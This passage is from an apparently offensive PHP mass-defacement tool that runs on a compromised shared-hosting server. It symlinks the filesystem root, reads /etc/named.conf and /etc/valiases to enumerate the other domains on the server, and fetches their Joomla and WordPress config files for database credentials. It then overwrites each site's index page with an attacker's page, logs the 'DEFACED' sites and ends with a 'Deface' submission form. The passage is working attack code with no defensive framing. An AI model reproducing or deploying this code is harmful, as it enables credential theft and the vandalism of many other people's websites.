536. echo '<td align="center"><span class="red">FAILED</span></td>';
537. }
538. echo '</tr>';
539.         }
540.        
541. // second wordpress guess
542. if($wordpress2 && preg_match('/DB_NAME/i',$wordpress2)){
543. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
544. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
545. $res = index_changer_wp($wordpress2, $index);
546. echo '<td>'.$res['output'].'</td>';
547. if($res['cond']) {
548. echo '<td align="center"><span class="green">DEFACED</span></td>';
549. fwrite($khaled, 'http://'.$site_urlto.'/blog/wp-content/themes/'.$res['template'].'/index.php<br>');
550. $count2++;
551. } else {
552. echo '<td align="center"><span class="red">FAILED</span></td>';
553. }
554. echo '</tr>';
555.         }
556.        
557. // third wordpress guess
558. if($wordpress3 && preg_match('/DB_NAME/i',$wordpress3)){
559. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
560. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
561. $res = index_changer_wp($wordpress3, $index);
562. echo '<td>'.$res['output'].'</td>';
563. if($res['cond']) {
564. echo '<td align="center"><span class="green">DEFACED</span></td>';
565. fwrite($khaled, 'http://'.$site_urlto.'/wp/wp-content/themes/'.$res['template'].'/index.php<br>');
566. $count2++;
567. } else {
568. echo '<td align="center"><span class="red">FAILED</span></td>';
569. }
570. echo '</tr>';
571.         }
572.    
573. }
574. echo '</table>';
575. echo '<hr/>';
576. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
577. echo '<a href="defaced.html" target="_blank">Show All</a><br />';
578. }
579.  
580. elseif($_POST['mode']==1) {
581.     @mkdir('sym',0777);
582.     $wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
583.     $fp = @fopen ('sym/.htaccess','w');
584.     fwrite($fp, $wr);
585.     @symlink('/','sym/root');
586.     $dominios = @file_get_contents("/etc/named.conf");
587.     @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
588.     $out[1] = array_unique($out[1]);
589.     $numero_dominios = count($out[1]);
590.     echo "Total domains: $numero_dominios <br><br />";
591.     $def = $_POST['tunisia'];
592.     $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
593.     $output = fopen('defaced.html', 'a+');
594.     echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>  
595.     <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");  
596.    $j = 1;
597.     $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
598.     for($i = $st; $i <= $numero_dominios; $i++)
599.     {
600.         $domain = $out[1][$i];
601.         $dono_arquivo = @fileowner("/etc/valiases/".$domain);
602.         $infos = @posix_getpwuid($dono_arquivo);
603.        
604.         if($infos['name']!='root') {
605. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
606. $config001 = @file_get_contents($base_url.$infos['name']."/public_html/joomla/configuration.php");
607. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
608. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
609.  
610. if($config001 && preg_match('/dbprefix/i',$config001)){
611. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
612. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
613. $res = index_changer_joomla($config001, $def, $domain);
614. echo '<td>'.$res['output'].'</td>';
615. if($res['cond']) {
616. echo '<td align="center"><span class="green">DEFACED</span></td>';
617. fwrite($output, 'http://'.$domain."<br>");
618. $count1 = $count+1;
619. } else {
620. echo '<td align="center"><span class="red">FAILED</span></td>';
621. }
622. echo '</tr>';
623. }
624.        
625. if($config01 && preg_match('/dbprefix/i',$config01)){
626. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
627. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
628. $res = index_changer_joomla($config01, $def, $domain);
629. echo '<td>'.$res['output'].'</td>';
630. if($res['cond']) {
631. echo '<td align="center"><span class="green">DEFACED</span></td>';
632. fwrite($output, 'http://'.$domain."<br>");
633. $count1 = $count+1;
634. } else {
635. echo '<td align="center"><span class="red">FAILED</span></td>';
636. }
637. echo '</tr>';
638. }
639.  
640. if($config02 && preg_match('/DB_NAME/i',$config02)){
641. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
642. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
643. $res = index_changer_wp($config02, $def);
644. echo '<td>'.$res['output'].'</td>';
645. if($res['cond']) {
646. echo '<td align="center"><span class="green">DEFACED</span></td>';
647. fwrite($output, 'http://'.$domain."<br>");
648. $count2 = $count2+1;
649. } else {
650. echo '<td align="center"><span class="red">FAILED</span></td>';
651. }
652. echo '</tr>';
653. }
654. if($config03 && preg_match('/DB_NAME/i',$config03)){
655. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
656. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
657. $res = index_changer_wp($config03, $def);
658. echo '<td>'.$res['output'].'</td>';
659. if($res['cond']) {
660. echo '<td align="center"><span class="green">DEFACED</span></td>';
661. fwrite($output, 'http://'.$domain."<br>");
662. $count2 = $count2+1;
663. } else {    
664. echo '<td align="center"><span class="red">FAILED</span></td>';
665. }
666. echo '</tr>';
667. }
668.         }
669.     }
670.     echo '</table>';
671.     echo '<hr/>';
672.     echo 'Total Defaced = '.$count1 + $count2.' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
673.     echo '<a href="defaced.html" target="_blank">Show All</a><br />';
674. }
675. else {
676. echo '
677. <table>
678. <form method="post">
679. <tr>
680.     <td>index url : </td>
681.     <td><input type="text" size="60" name="tunisia" placeholder="put your index url here !"></td>
682. </tr>
683. <tr>
684.     <td>use : </td>
685. </tr>
686. <tr>
687.     <td><input type="radio" value="1" name="mode"></td><td>/etc/named.conf</td>
688. </tr>
689. <tr>
690.     <td><input type="radio" checked="checked" value="2" name="mode"></td><td>/var/named</td>
691. </tr>
692. <tr>
693. <td><br><input type="submit" name="tunisia_deface" value="Deface"></td>
694. </tr>
695. </form>
696. </center>
697. </body>
698. </html>
699. ';
700. }
701. ?>